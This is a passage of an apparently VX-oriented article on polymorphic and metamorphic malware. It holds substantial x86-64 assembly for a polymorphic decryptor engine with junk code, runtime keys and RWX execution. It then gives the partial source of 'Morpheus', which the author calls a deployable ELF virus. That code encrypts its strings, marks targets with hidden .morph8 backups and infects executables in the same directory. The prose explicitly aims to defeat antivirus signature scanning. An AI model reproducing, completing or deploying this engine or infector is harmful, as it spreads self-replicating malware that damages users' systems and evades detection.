    mov al, 0x48
    stosb
    mov al, 0xC1
    stosb
    mov al, 0xC2
    stosb
    mov al, 7
    stosb

    ; inc rsi
    mov al, 0x48
    stosb
    mov al, 0xFF
    stosb
    mov al, 0xC6
    stosb

    ; dec rcx
    mov al, 0x48
    stosb
    mov al, 0xFF
    stosb
    mov al, 0xC9
    stosb

    ; jmp loop
    mov al, 0xEB
    stosb
    mov rax, r14
    sub rax, rdi
    sub rax, 1                                  ; negative rel8 back to loop start
    stosb

    ; copy to allocated memory
    ; mov rdi,rbx
    mov al, 0x48
    stosb
    mov al, 0x89
    stosb
    mov al, 0xDF
    stosb

    ; calculate engine position
    mov rax, [rel p_entry]
    mov rbx, [rel stub_sz]
    add rax, rbx

    ; RIP-relative offset
    mov rbx, rdi
    add rbx, 7
    sub rax, rbx
    mov rdx, rax                                ; keep disp32 (AL is reused for opcode bytes)

    ; lea rsi,[rip+offset]
    mov al, 0x48
    stosb
    mov al, 0x8D
    stosb
    mov al, 0x35
    stosb
    mov eax, edx
    stosd

    ; mov rcx,engine_size
    mov al, 0x48
    stosb
    mov al, 0xC7
    stosb
    mov al, 0xC1
    stosb
    mov rax, [rel engine_size]
    test rax, rax
    jnz .engine_sz2
    mov rax, 256
.engine_sz2:
    stosd

    ; rep movsb
    mov al, 0xF3
    stosb
    mov al, 0xA4
    stosb

    mov al, RET_OPCODE
    stosb

    ret

bf_boo:
    push rbx

    mov rax, rdi
    sub rax, [rel p_entry]
    add rax, 300
    cmp rax, [rel sz]

    pop rbx
    ret

; generate runtime keys
gen_runtm:
    push rbx
    push rcx

    rdtsc                                       ; entropy from RDTSC
    shl rdx, 32
    or rax, rdx
    xor rax, [rel key]                          ; mix with user key

    mov rbx, rsp                                ; stack entropy
    xor rax, rbx

    call .get_rip                               ; RIP entropy
.get_rip:
    pop rbx
    xor rax, rbx

    rol rax, 13

    mov rbx, rax                                ; dynamic constant
    ror rbx, 19
    xor rbx, rsp
    add rax, rbx

    mov rbx, rax                                ; dynamic XOR
    rol rbx, 7
    not rbx
    xor rax, rbx

    mov [rel stub_key], rax

    rol rax, 7                                  ; secondary key
    mov rbx, 0xCAFE0F00
    shl rbx, 32
    or rbx, 0xDEADC0DE
    xor rax, rbx
    mov [rel sec_key], rax

    mov rax, [rel stub_key]                     ; ensure different from user key
    cmp rax, [rel key]
    jne .keys_different
    not rax
    mov [rel stub_key], rax
.keys_different:

    pop rcx
    pop rbx
    ret

; PRNG
next_random:
    push rdx
    mov rax, [rel seed]
    mov rdx, rax
    shl rdx, 13
    xor rax, rdx
    mov rdx, rax
    shr rdx, 17
    xor rax, rdx
    mov rdx, rax
    shl rdx, 5
    xor rax, rdx
    mov [rel seed], rax
    pop rdx
    ret

random_range:
    push rdx
    call next_random
    pop rcx
    test rcx, rcx
    jz .range_zero
    xor rdx, rdx
    div rcx
    mov rax, rdx
    ret
.range_zero:
    xor rax, rax
    ret

; random boolean
yes_no:
    call next_random
    and rax, 0xF
    cmp rax, 7
    setbe al
    movzx rax, al
    ret

; select random registers
get_rr:
    call next_random
    and rax, 7
    cmp al, REG_RSP
    je get_rr
    cmp al, REG_RAX                             ; avoid rax as base
    je get_rr
    mov [rel reg_base], al

.retry_count:
    call next_random
    and rax, 7
    cmp al, REG_RSP
    je .retry_count
    cmp al, REG_RAX                             ; avoid rax as count
    je .retry_count
    cmp al, [rel reg_base]
    je .retry_count
    mov [rel reg_count], al

.retry_key:
    call next_random
    and rax, 7
    cmp al, REG_RSP
    je .retry_key
    cmp al, [rel reg_base]
    je .retry_key
    cmp al, [rel reg_count]
    je .retry_key
    mov [rel reg_key], al

.retry_junk1:
    call next_random
    and rax, 15
    cmp al, REG_RSP
    je .retry_junk1
    mov [rel junk_reg1], al

.retry_junk2:
    call next_random
    and rax, 15
    cmp al, REG_RSP
    je .retry_junk2
    cmp al, [rel junk_reg1]
    je .retry_junk2
    mov [rel junk_reg2], al

.retry_junk3:
    call next_random
    and rax, 15
    cmp al, REG_RSP
    je .retry_junk3
    cmp al, [rel junk_reg1]
    je .retry_junk3
    cmp al, [rel junk_reg2]
    je .retry_junk3
    mov [rel junk_reg3], al
    ret

; select algorithm
set_al:
    call next_random
    and rax, 3
    mov [rel alg0_dcr], al
    ret

; generate prologue
gen_p:
    call gen_jmp
    call trash
    call yes_no
    test rax, rax
    jz .skip_trash1
    call trash
.skip_trash1:

    ; mov reg_key,key
    call gen_jmp
    mov al, 0x48
    stosb
    mov al, 0xB8
    add al, [rel reg_key]
    stosb
    mov byte [rel prolog_set], 1
    mov rax, [rel key]
    stosq

    call yes_no
    test rax, rax
    jz .skip_trash2
    call trash
.skip_trash2:
    ret

; generate decrypt loop
gen_dec:
    mov [rel jmp_back], rdi

    call trash
    call gen_jmp

    ; mov reg_base,rdi (data pointer)
    mov al, 0x48
    stosb
    mov al, 0x89
    stosb
    mov al, 0xF8
    add al, [rel reg_base]
    stosb

    call trash
    call gen_jmp

    ; mov reg_count,rsi (size)
    mov al, 0x48
    stosb
    mov al, 0x89
    stosb
    mov al, 0xF0
    add al, [rel reg_count]
    stosb

    call trash
    call gen_jmp

.decr_loop:
    movzx rax, byte [rel alg0_dcr]
    cmp al, 0
    je .gen_algo_0
    cmp al, 1
    je .gen_algo_1
    cmp al, 2
    je .gen_algo_2
    jmp .gen_algo_3

.gen_algo_0:
    ; add/rol/xor
    call gen_add_mem_key
    call trash
    call gen_trash
    call gen_rol_mem_16
    call trash
    call gen_trash
    call gen_xor_mem_key
    jmp .gen_loop_end

.gen_algo_1:
    ; xor/rol/xor
    call gen_xor_mem_key
    call trash
    call gen_trash
    call gen_rol_mem_16
    call trash
    call gen_trash
    call gen_xor_mem_key
    jmp .gen_loop_end

.gen_algo_2:
    ; sub/ror/xor
    call gen_sub_mem_key
    call trash
    call gen_trash
    call gen_ror_mem_16
    call trash
    call gen_trash
    call gen_xor_mem_key
    jmp .gen_loop_end

.gen_algo_3:
    ; xor/add/xor
    call gen_xor_mem_key
    call trash
    call gen_trash
    call gen_add_mem_key
    call trash
    call gen_trash
    call gen_xor_mem_key

.gen_loop_end:
    call trash
    call gen_jmp

    mov al, ADD_REG_IMM8
    stosb
    mov al, 0xC0
    add al, [rel reg_base]
    stosb
    mov al, 8
    stosb

    call trash
    call gen_jmp

    ; generate DEC instruction
    movzx rax, byte [rel reg_count]
    cmp al, 8
    jb .dec_no_rex
    mov al, 0x49                                ; rex.wb for r8-r15
    stosb
    movzx rax, byte [rel reg_count]
    sub al, 8
    jmp .dec_encode
.dec_no_rex:
    mov al, 0x48                                ; rex.w for rax-rdi
    stosb
    movzx rax, byte [rel reg_count]
.dec_encode:
    and al, 7
    add al, 0xC8                                ; modrm /1 = dec reg
    mov ah, al
    mov al, 0xFF                                ; dec opcode
    stosw                                       ; emits FF, C8+reg

    mov al, TEST_REG_REG
    stosb
    mov al, [rel reg_count]
    shl al, 3
    add al, [rel reg_count]
    add al, 0xC0
    stosb

    mov ax, JNZ_LONG
    stosw
    mov rax, [rel jmp_back]
    sub rax, rdi
    sub rax, 4                                  ; negative rel32 back to loop start
    stosd
    ret

; algorithm generators
gen_add_mem_key:
    call gen_jmp
    mov al, ADD_MEM_REG
    stosb
    mov dl, [rel reg_key]
    shl dl, 3
    mov al, [rel reg_base]
    add al, dl
    stosb
    ret

gen_sub_mem_key:
    call gen_jmp
    mov al, 0x48
    stosb
    mov al, 0x29
    stosb
    mov dl, [rel reg_key]
    shl dl, 3
    mov al, [rel reg_base]
    add al, dl
    stosb
    ret

gen_xor_mem_key:
    call gen_jmp
    mov ax, XOR_MEM_REG
    mov dl, [rel reg_key]
    shl dl, 3
    mov ah, [rel reg_base]
    add ah, dl
    stosw
    ret

gen_rol_mem_16:
    call gen_jmp
    mov al, 0x48
    stosb
    mov ax, ROL_MEM_IMM
    add ah, [rel reg_base]
    stosw
    mov al, 16
    stosb
    ret

gen_ror_mem_16:
    call gen_jmp
    mov al, 0x48
    stosb
    mov al, 0xC1
    stosb
    mov al, 0x08
    add al, [rel reg_base]
    stosb
    mov al, 16
    stosb
    ret

; basic junk
trash:
    call yes_no
    test rax, rax
    jz .skip_push_pop

    movzx rax, byte [rel junk_reg1]            ; push/pop junk
    cmp al, 8
    jb .push_no_rex
    mov al, 0x41
    stosb
    movzx rax, byte [rel junk_reg1]
    sub al, 8
.push_no_rex:
    add al, PUSH_REG
    stosb

    movzx rax, byte [rel junk_reg1]            ; pop the same register: net effect zero
    cmp al, 8
    jb .pop_no_rex
    mov al, 0x41
    stosb
    movzx rax, byte [rel junk_reg1]
    sub al, 8
.pop_no_rex:
    add al, POP_REG
    stosb
.skip_push_pop:

    call gen_jmp
    ret

; jumps
gen_jmp:
    call yes_no
    test rax, rax
    jz .short_jmp
    mov al, JMP_REL32
    stosb
    mov eax, 1
    stosd
    call next_random
    and al, 0xFF
    stosb
    jmp .jmp_exit
.short_jmp:
    mov al, JMP_SHORT
    stosb
    mov al, 1
    stosb
    call next_random
    and al, 0xFF
    stosb
.jmp_exit:
    ret

; self-modifying junk
gen_self:
    mov al, CALL_REL32
    stosb
    mov eax, 3
    stosd
    mov al, JMP_REL32
    stosb
    mov ax, 0x06EB                              ; jmp over the 6-byte junk tail
    stosw

    call next_random
    and rax, 2
    lea rdx, [rel junk_reg1]
    movzx rdx, byte [rdx + rax]

    mov al, POP_REG
    add al, dl
    stosb
    mov al, 0x48
    stosb
    mov al, 0xFF
    stosb
    mov al, 0xC0
    add al, dl
    stosb
    mov al, PUSH_REG
    add al, dl
    stosb
    mov al, RET_OPCODE
    stosb
    ret

; advanced junk procedures
gen_trash:
    call yes_no
    test rax, rax
    jz .try_proc2

    mov al, CALL_REL32
    stosb
    mov eax, 2
    stosd
    mov ax, 0x08EB                              ; jmp over the 8-byte junk proc
    stosw
    mov al, 0x55
    stosb
    mov al, 0x48
    stosb
    mov al, 0x89
    stosb
    mov al, 0xE5
    stosb
    mov ax, FNINIT_OPCODE
    stosw
    mov al, 0x5D
    stosb
    mov al, RET_OPCODE
    stosb
    jmp .exit_trash

.try_proc2:
    call yes_no
    test rax, rax
    jz .try_proc3

    mov al, CALL_REL32
    stosb
    mov eax, 2
    stosd
    mov ax, 0x0BEB                              ; jmp over the 11-byte junk proc
    stosw
    mov al, 0x60
    stosb
    mov eax, 0xD12BC333
    stosd
    mov eax, 0x6193C38B
    stosd
    mov al, 0x61
    stosb
    mov al, RET_OPCODE
    stosb
    jmp .exit_trash

.try_proc3:
    call yes_no
    test rax, rax
    jz .exit_trash

    mov al, CALL_REL32
    stosb
    mov eax, 2
    stosd
    mov eax, 0x525010EB
    stosd
    mov ax, 0xC069
    stosw
    mov eax, 0x90
    stosd
    mov al, 0x2D
    stosb
    mov eax, 0xDEADC0DE
    stosd
    mov ax, 0x585A
    stosw
    mov al, RET_OPCODE
    stosb

.exit_trash:
    ret

; dummy procedures
gen_dummy:
    call yes_no
    test rax, rax
    jz .skip_dummy

    mov al, CALL_REL32
    stosb
    mov eax, 15
    stosd

    mov al, 0x48
    stosb
    mov al, TEST_REG_REG
    stosb
    mov al, 0xC0
    stosb

    mov al, JZ_SHORT
    stosb
    mov al, 8
    stosb

    mov al, 0x55
    stosb
    mov al, 0x48
    stosb
    mov al, 0x89
    stosb
    mov al, 0xE5
    stosb

    mov ax, FNINIT_OPCODE
    stosw
    mov ax, FNOP_OPCODE
    stosw

    mov al, 0x48
    stosb
    mov al, 0xB8
    stosb
    call next_random                            ; random imm64
    stosq

    mov al, 0x5D
    stosb
    mov al, RET_OPCODE
    stosb

.skip_dummy:
    ret

; execute generated stub
exec_c:
    push rbp
    mov rbp, rsp
    sub rsp, 32
    push rbx
    push r12
    push r13
    push r14
    push r15

    mov r12, rdi                                ; stub code
    mov r13, rsi                                ; stub size
    mov r14, rdx                                ; payload data

    ; validate input
    test r12, r12
    jz .error
    test r13, r13
    jz .error
    cmp r13, 1
    jb .error
    cmp r13, 65536
    ja .error

    mov rax, 9                                  ; mmap
    mov rdi, 0
    mov rsi, r13
    add rsi, 4096                               ; padding
    mov rdx, 0x7                                ; rwx
    mov r10, 0x22                               ; private|anon
    mov r8, -1
    mov r9, 0
    syscall

    cmp rax, -4095                              ; mmap returns -errno on failure
    jae .error
    test rax, rax
    jz .error
    mov rbx, rax

    ; copy stub to executable memory
    mov rdi, rbx
    mov rsi, r12
    mov rcx, r13
    rep movsb

    ; execute stub
    cmp rbx, 0x1000
    jb .error
    call rbx

    ; cleanup
    mov rax, 11                                 ; munmap
    mov rdi, rbx
    mov rsi, r13
    add rsi, 4096
    syscall

    mov rax, 1                                  ; success
    jmp .done

.error:
    xor rax, rax

.done:
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbx
    add rsp, 32
    pop rbp
    ret

Current Limitations

At present, it is strictly limited to Linux x64 because of direct syscall dependencies: the mmap usage is Linux-specific, and the register conventions are bound to x64. Porting to Windows would require adapting calling conventions and likely rewriting large parts of the engine logic. macOS has its own syscall numbers and memory-protection details, so simple changes would not be enough to make it run there.

The algorithm set is deliberately limited to four variants. This scale is sufficient to prove the concept without making the system overly complex or fragile. Expanding to dozens of equivalent variants is feasible but significantly increases the risk of introducing bugs and requires careful balancing of complexity and correctness.

There is currently no runtime recompilation mechanism: each variant is generated once and remains static during execution. Self-modifying variants could further improve evasion but introduce instability and substantially raise implementation cost.

Future directions could include:

  • Adding a syscall abstraction layer for true cross-platform support (Linux, Windows, macOS).
  • Expanding the algorithm set and improving encryption/obfuscation (currently quite crude in this area).
  • Building a dynamic rewriting engine that supports self-modifying payloads.

Even in its current form, it has already achieved the core goals: functional correctness, deep signature diversity, entropy-driven key generation, intelligent junk injection, and multi-layered polymorphic structure. Implementation details can vary, but these foundational principles remain stable.

This is a foundational polymorphic engine, intentionally designed to be “usable and clear.” You can use it first to understand the core techniques, then build upon it. Once you internalize these layers of entropy, obfuscation, and instruction encoding, you can take it in any direction you choose.

What Truly Makes Code Mutable

Metamorphic code is more than obfuscation — it rewrites itself. On every execution, it parses its own binary, locates mutable regions, and replaces them with semantically equivalent but syntactically different instruction sequences.

For a simple task like clearing a register, you can use XOR RAX, RAX, SUB RAX, RAX, MOV RAX, 0, or even PUSH 0; POP RAX. Same effect, different opcodes. To a static scanner, these are often unrelated.
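The divergence is concrete at the byte level. Here is a small sketch (Python, with the x86-64 encodings written out by hand) showing that these four equivalent register clears share no common byte pattern:

```python
# Four semantically equivalent ways to clear RAX, with their x86-64 encodings.
# A signature matched against any one of them misses the other three.
variants = {
    "xor rax, rax":    bytes([0x48, 0x31, 0xC0]),
    "sub rax, rax":    bytes([0x48, 0x29, 0xC0]),
    "mov rax, 0":      bytes([0x48, 0xC7, 0xC0, 0x00, 0x00, 0x00, 0x00]),
    "push 0; pop rax": bytes([0x6A, 0x00, 0x58]),
}

encodings = list(variants.values())
assert len(set(encodings)) == len(encodings)     # every variant is a distinct byte string
assert len({len(e) for e in encodings}) > 1      # even the lengths differ
```

A replacement engine is essentially such a catalog plus a random pick per occurrence.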

A metamorphic engine exploits this by maintaining an instruction-level replacement catalog. Each iteration applies randomized transformations: register renaming, safe reordering of instructions, junk code insertion, and control-flow reconstruction. Logic remains unchanged, but layout continuously evolves.

Combined with replication propagation, each infected binary carries mutations from its “parent” and adds new mutations during infection. Over time, this creates a family of functionally equivalent but structurally distinct samples. No fixed signatures, no stable patterns — only continuous evolution at the opcode level. This is why it is often called “assembly heaven.”

Classic Reference: MetaPHOR

In 2002, there was a very solid article dissecting metamorphic engine structure: The Mental Driller’s “How I Made MetaPHOR and What I’ve Learned.” Yes, 2002 — ancient by today’s standards, but the core principles remain strikingly relevant. Some adaptation is needed for modern systems, but the underlying mechanisms are still solid.

Polymorphism focuses on camouflage: adjusting the decryptor, wrapping the payload, keeping the core static. Metamorphism discards the shell and directly modifies the interior. It disassembles complete code blocks, rewrites them from scratch, and reassembles the binary — producing new logical layouts, altered control flow, and shifted instruction patterns. Every landing looks different.

It is not just renaming registers or sprinkling NOPs. It is full-code-level mutation — deep structural churning that leaves no stable anchor points for static fingerprints.

— Disassembly and Shrinking —

To mutate, a virus (VX) must first disassemble itself into an internal pseudo-assembly format — a custom abstraction layer that makes original opcodes readable and transformable. It breaks apart its instruction stream, decodes jumps, calls, and conditional branches, then maps control flow into manageable data structures.

After disassembly, the code is written into a memory buffer. Pointer tables are built for jump targets, call destinations, and other critical control elements to ensure relationships are not broken during rewriting.

Next comes the shrinker. This stage scans for bloated instruction sequences and compresses them into minimal equivalent forms.

Original Instruction    Compressed Instruction    Description
MOV reg, reg            NOP                       Dead operation with no effect
XOR reg, reg            MOV reg, 0                Clear the register (canonical intermediate form)

The shrinker’s job is to trim fat: fold redundant chains, clean up leftovers, and free space for the next round of mutation.
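As a sketch, here is the same idea over a toy pseudo-assembly IR (plain tuples instead of the engine's real structures, so the rules from the table are easy to see):

```python
# Toy shrinker over a pseudo-assembly IR: each instruction is a (mnemonic, operands...) tuple.
# Rules mirror the table above: fold dead moves, canonicalize register clears.
def shrink(ir):
    out = []
    for op, *args in ir:
        if op == "mov" and len(args) == 2 and args[0] == args[1]:
            out.append(("nop",))                 # MOV reg, reg -> NOP
        elif op == "xor" and len(args) == 2 and args[0] == args[1]:
            out.append(("mov", args[0], 0))      # XOR reg, reg -> canonical clear
        else:
            out.append((op, *args))
    return out

ir = [("mov", "rbx", "rbx"), ("xor", "rcx", "rcx"), ("add", "rax", "rbx")]
assert shrink(ir) == [("nop",), ("mov", "rcx", 0), ("add", "rax", "rbx")]
```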

— Permutation and Expansion —

After shrinking comes the permutator. Its task is shuffling: reordering instructions and injecting entropy while keeping logic intact, making layout unpredictable.

It also replaces equivalent instructions: same result, different operation.

Following permutation is the expander — the opposite of the shrinker. It expands single instructions into equivalent two- or three-instruction sequences. Recursive expansion continuously increases code complexity.

Control variables impose hard limits to prevent unbounded growth.
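A minimal expander sketch in the same toy-IR spirit shows both halves of the idea: recursive equivalent expansion, and a depth limit acting as the control variable that stops the growth:

```python
import random

# Toy expander: rewrite MOV reg, imm into an equivalent two-instruction sequence.
# `depth` caps recursive expansion so code size stays bounded.
def expand(ins, depth, rng):
    op, *args = ins
    if depth == 0 or op != "mov" or not isinstance(args[1], int):
        return [ins]
    reg, imm = args
    split = rng.randrange(imm + 1) if imm > 0 else 0
    seq = [("mov", reg, split), ("add", reg, imm - split)]   # same final value
    out = []
    for sub in seq:
        out.extend(expand(sub, depth - 1, rng))
    return out

rng = random.Random(7)
code = expand(("mov", "rax", 100), depth=3, rng=rng)

# simulate: whatever shape came out, the register must still end up holding 100
val = 0
for op, reg, imm in code:
    val = imm if op == "mov" else val + imm
assert val == 100
```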

Finally, the assembler finishes the job: it reassembles the mutated code back into valid machine code.

Only after completing this loop does the VX become a structurally unique but functionally complete new variant. Payload unchanged, appearance brand new.

— Generational Mutation —

You have seen how we do this in polymorphism: injecting junk code and replacing registers. Metamorphic thinking is similar but goes much deeper.

When the VX completes its self-rewrite in memory, it writes the new variant back to disk. Every execution produces a “new copy” containing random junk code and rewritten logic.

(figure: vx-junk-disasm, a disassembly showing the scattered JUNK macro calls)

Notice those JUNK macro calls? They are randomly scattered. Each is a marker — a hook point that can be safely modified. Smart Trash: deliberately useless, designed specifically to interfere with disassemblers and scanners.

We use a dedicated scanning function to handle them. It traverses the code, looks for PUSH/POP patterns on the same registers (spaced 8 bytes apart), and marks the hit locations. Once marked, these junk segments are overwritten with new, harmless, randomized replacement sequences.

This loop is the core. It hunts for JUNK sequences and replaces them with new random instruction chains on every run. Each JUNK call marks a modifiable slot — essentially a sandboxed code region for generational mutation. Behavior harmless, structure chaotic.
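A byte-level sketch of that hunt, assuming the 10-byte slot layout (push A, push B, six filler bytes, pop B, pop A) used by the Morpheus JUNK macro shown later:

```python
import random

PUSH, POP = 0x50, 0x58

def find_junk(buf):
    """Find 10-byte junk slots: push A, push B, <6 filler bytes>, pop B, pop A."""
    hits = []
    for i in range(len(buf) - 9):
        a, b = buf[i] - PUSH, buf[i + 1] - PUSH
        if 0 <= a <= 7 and 0 <= b <= 7 and \
           buf[i + 8] == POP + b and buf[i + 9] == POP + a:
            hits.append(i)
    return hits

def regenerate(buf, i, rng):
    """Overwrite a junk slot with a fresh harmless variant (new register pair)."""
    a, b = rng.sample([0, 1, 2, 3], 2)           # rax, rcx, rdx, rbx
    modrm = 0xC0 | (a << 3) | b                  # xchg reg_a, reg_b (done twice = no-op)
    buf[i:i + 10] = bytes([PUSH + a, PUSH + b,
                           0x48, 0x87, modrm, 0x48, 0x87, modrm,
                           POP + b, POP + a])

code = bytearray(b"\x90" * 4 +
                 bytes([0x50, 0x53, 0x48, 0x87, 0xC3, 0x48, 0x87, 0xC3, 0x5B, 0x58]) +
                 b"\x90" * 4)
slots = find_junk(code)
assert slots == [4]
regenerate(code, 4, random.Random(1))
assert find_junk(code) == [4]                    # still a valid slot, new bytes inside
```

In the real engine the replacement is emitted machine code, not Python bytes, but the scan/mark/overwrite cycle is the same.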

After mutation completes, the VX propagates by copying the new variant into executable files discovered in the same directory. The copy has changed structure but unchanged behavior. True polymorphic/metamorphic malware is not about “fooling AV once,” but about continuous mutation — reshaping the binary with every “breath.” As long as logic remains intact and structure keeps changing, static detection struggles to gain a foothold.

This is only the minimal viable set, covering the key mechanisms. It demonstrates the core path that allows VX code to mutate and survive. There is much more at deeper levels, but this is the foundation.

Morpheus

Now it is time for the code I mentioned alongside Veil64 to make its appearance.

Morpheus applies metamorphic principles to a real, runnable virus infector. This is not a theoretical demonstration — it is practical and deployable. It shows how a mutation engine can work end-to-end without relying on encryptors or packers.

The core idea is simple: Morpheus treats its own executable code the way a crypter treats a payload. It loads itself into memory, scans for known patterns, applies transformations, then writes out a mutated version that accomplishes the same tasks with different instruction sequences.

On every run, Morpheus roughly does the following:

  • Extracts obfuscated strings and executes its logic
  • Loads its own .text section
  • Disassembles code blocks
  • Identifies mutation points (NOPs, junk patterns, simple MOV/XOR operations, etc.)
  • Applies transformations (register shuffling, instruction replacement, code block reordering or expansion)
  • Generates structurally different but logically consistent code
  • Writes the mutated binary to a new target (usually another ELF in the same directory)
  • Patches headers as needed to keep it executable

Every generation is truly different — not just added junk and register swaps, but substantive structural change — while the payload and functionality remain fully intact. This allows Morpheus to self-replicate on every execution, rendering static signature detection unreliable. Combined with runtime transformation and actual rewriting of files on disk, traditional scanning methods struggle to track it consistently.

Junk code is always a balancing act. In Veil64 we used relatively basic junk padding. Here is a 10-byte sequence that has zero net effect but can easily be mistaken for compiler-generated register preservation code:

PUSH RAX
PUSH RBX
XCHG RAX, RBX
XCHG RAX, RBX
POP RBX
POP RAX

Morpheus makes heavy use of such sequences. The JUNK macro marks these blocks, and on every execution the engine scans and replaces them with structurally different but functionally equivalent junk patterns.

We implemented four register combinations for smart junk patterns. Each variant follows the same logic but uses different register pairs, producing unique byte sequences. These variants are functionally identical with zero side effects, yet their binary signatures change completely.
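The generator behind those variants is tiny. A sketch of the skeleton (the concrete register pairs below are illustrative; the engine picks its own four):

```python
# "Smart junk": same push/xchg/xchg/pop skeleton, different register pairs,
# so every variant is 10 bytes (JUNKLEN) with a unique byte signature.
# Register numbers follow x86-64 encoding order: rax=0, rcx=1, rdx=2, rbx=3.
def junk_variant(a, b):
    modrm = 0xC0 | (a << 3) | b                  # xchg reg_a, reg_b (swapped twice = no-op)
    return bytes([0x50 + a, 0x50 + b,            # push a; push b
                  0x48, 0x87, modrm,             # xchg
                  0x48, 0x87, modrm,             # xchg back
                  0x58 + b, 0x58 + a])           # pop b; pop a

pairs = [(0, 3), (1, 2), (3, 1), (2, 0)]         # four pair choices (illustrative)
variants = [junk_variant(a, b) for a, b in pairs]
assert all(len(v) == 10 for v in variants)       # matches JUNKLEN
assert len(set(variants)) == 4                   # four distinct byte signatures
```

Note that `junk_variant(0, 3)` reproduces exactly the JUNK macro bytes from the listing below.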

String Encryption

All strings are encrypted to evade static signature detection. I used a simple XOR scheme: each string gets its own key, and decryption is a single XOR pass. Why XOR? Because it is fast.
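You can verify the scheme offline. Using the `touc` bytes and the 0xAA key from the data section below (note that the NUL terminator encrypts to the key itself, since 0 XOR key = key):

```python
# XOR string decryption as used for the embedded strings: one key per string,
# zero terminator included (0 ^ key == key, so the last ciphertext byte is the key).
def decrypt(blob, key):
    out = bytes(b ^ key for b in blob)
    return out[:out.index(0)].decode("ascii")    # stop at the decrypted NUL

touc = bytes([0xDE, 0xC5, 0xDF, 0xC9, 0xC2, 0x8A, 0x8F, 0xD9, 0xAA])
assert decrypt(touc, 0xAA) == "touch %s"
```

This mirrors what `d_strmain` does below: index a key, XOR the blob, stop at the decoded NUL.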

Decryption runs once at startup. To add extra resistance, I included INT3 trap shellcode to disrupt debugger flow.

— Infection —

During the infection stage, we scan the directory for ELF binaries. The scanner performs several basic checks to filter out garbage files and retain only viable ELF executable targets (regular files, no hidden files, valid ELF magic, executable and writable permissions).

Before any overwrite, it creates a hidden backup prefixed with .morph8. If the backup already exists, infection is skipped — acting as an “already morphed” marker.
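In sketch form, the target filter and marker check look like this (the helper names are mine, not the engine's; the `.morph8` prefix is the real one):

```python
import os, stat, tempfile

ELF_MAGIC = b"\x7fELF"

def viable_target(path):
    """Basic target filter: regular, non-hidden, ELF magic, exec+write permissions."""
    if os.path.basename(path).startswith("."):
        return False
    st = os.stat(path)
    if not stat.S_ISREG(st.st_mode):
        return False
    if not os.access(path, os.X_OK | os.W_OK):
        return False
    with open(path, "rb") as f:
        return f.read(4) == ELF_MAGIC

def backup_marker(path):
    """Hidden backup name doubling as an 'already morphed' marker."""
    d, name = os.path.split(path)
    return os.path.join(d, ".morph8" + name)

with tempfile.TemporaryDirectory() as d:
    target = os.path.join(d, "victim")
    with open(target, "wb") as f:
        f.write(ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 57)   # minimal 64-byte header
    os.chmod(target, 0o755)
    assert viable_target(target)
    assert not os.path.exists(backup_marker(target))          # not yet infected
```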

— Morpheus Engine —

;;
;;     M O R P H E U S   [ polymorphic ELF infector ]
;;     ------------------------------------------------
;;     stealth // mutation // syscall-only // junked //
;;     ------------------------------------------------
;;     0xBADC0DE // .morph8 // Linux x86_64 // 0xf00sec
;;

%define PUSH 0x50
%define POP 0x58
%define MOV 0xB8
%define NOP 0x90
%define REX_W 0x48
%define XCHG_OP 0x87
%define XCHG_BASE 0xC0

%define ADD_OP 0x01
%define AND_OP 0x21
%define XOR_OP 0x31
%define OR_OP 0x09
%define SBB_OP 0x19
%define SUB_OP 0x29

%define JUNKLEN 10

; push rax,rbx; xchg rax,rbx; xchg rax,rbx; pop rbx,rax
%macro JUNK 0
    db 0x50, 0x53, 0x48, 0x87, 0xC3, 0x48, 0x87, 0xC3, 0x5B, 0x58
%endmacro

section .data

; ELF header
ELF_MAGIC       dd 0x464C457F
ELF_CLASS64     equ 2
ELF_DATA2LSB    equ 1
ELF_VERSION     equ 1
ELF_OSABI_SYSV  equ 0
ET_EXEC         equ 2
ET_DYN          equ 3
EM_X86_64       equ 62

prefixes db ADD_OP, AND_OP, XOR_OP, OR_OP, SBB_OP, SUB_OP, 0

bin_name times 256 db 0
orig_exec_name times 256 db 0
msg_cat db " /\_/\ ",10
        db "( o.o )",10
        db " > ^ <",10,0                    ; payload
current_dir db "./",0
; encrypted strings
cmhd                db 0x36, 0x3D, 0x38, 0x3A, 0x31, 0x75, 0x7E, 0x2D, 0x75, 0x70, 0x26, 0x55     ; "chmod +x %s"
tchh                db 0xAF, 0xA4, 0xA1, 0xA3, 0xA8, 0xEC, 0xE7, 0xB4, 0xEC, 0xE9, 0xBF, 0xCC     ; "chmod +x %s"
touc                db 0xDE, 0xC5, 0xDF, 0xC9, 0xC2, 0x8A, 0x8F, 0xD9, 0xAA                         ; "touch %s"
cpcm                db 0x9C, 0x8F, 0xDF, 0xDA, 0x8C, 0xDF, 0xDA, 0x8C, 0xFF                         ; "cp %s %s"
hidd                db 0x59, 0x1A, 0x18, 0x05, 0x07, 0x1F, 0x4F, 0x77                               ; ".morph8"
exec                db 0x1D, 0x1C, 0x16, 0x40, 0x33                                                 ; "./%s"
vxxe                db 0xFE, 0xF0, 0xF0, 0x88                                                       ; "vxx"

xor_keys            db 0xAA, 0x55, 0xCC, 0x33, 0xFF, 0x88, 0x77
vierge_val          db 1                                                                           ; first generation marker
signme              dd 0xF00C0DE                                                                   ; PRNG seed

section .bss
    code            resb 65536      ; viral body
    codelen         resq 1
    vierge          resb 1          ; generation flag
    dir_buf         resb 4096
    temp_buf        resb 1024
    elf_header      resb 64

; runtime decrypted strings
touch_cmd_fmt resb   32
chmod_cmd_fmt resb   32
touch_chmod_fmt resb 32
exec_cmd_fmt resb    32
cp_cmd_fmt resb      32
vxx_str resb         8
hidden_prefix resb   16

section .text
    global _start

%define SYS_read      0
%define SYS_write     1
%define SYS_open      2
%define SYS_close     3
%define SYS_exit      60
%define SYS_lseek     8
%define SYS_getdents64 217
%define SYS_access    21
%define SYS_getrandom 318
%define SYS_execve    59
%define SYS_fstat     5
%define SYS_mmap      9
%define SYS_brk       12
%define SYS_fork      57
%define SYS_wait4     61

%define F_OK 0
%define X_OK 1
%define W_OK 2

%define O_RDONLY 0
%define O_WRONLY 1
%define O_RDWR   2
%define O_CREAT  64
%define O_TRUNC  512

%define PROT_READ  1
%define PROT_WRITE 2
%define MAP_PRIVATE 2
%define MAP_ANONYMOUS 32

section .rodata
    shell_path db "/bin/sh",0
    sh_arg0 db "sh",0
    sh_arg1 db "-c",0

; syscall wrappers with junk insertion

sys_write:
    mov rax, SYS_write
    JUNK
    syscall
    ret

sys_read:
    mov rax, SYS_read
    JUNK
    syscall
    ret

sys_open:
    mov rax, SYS_open
    JUNK
    syscall
    ret

sys_close:
    mov rax, SYS_close
    syscall
    ret

sys_lseek:
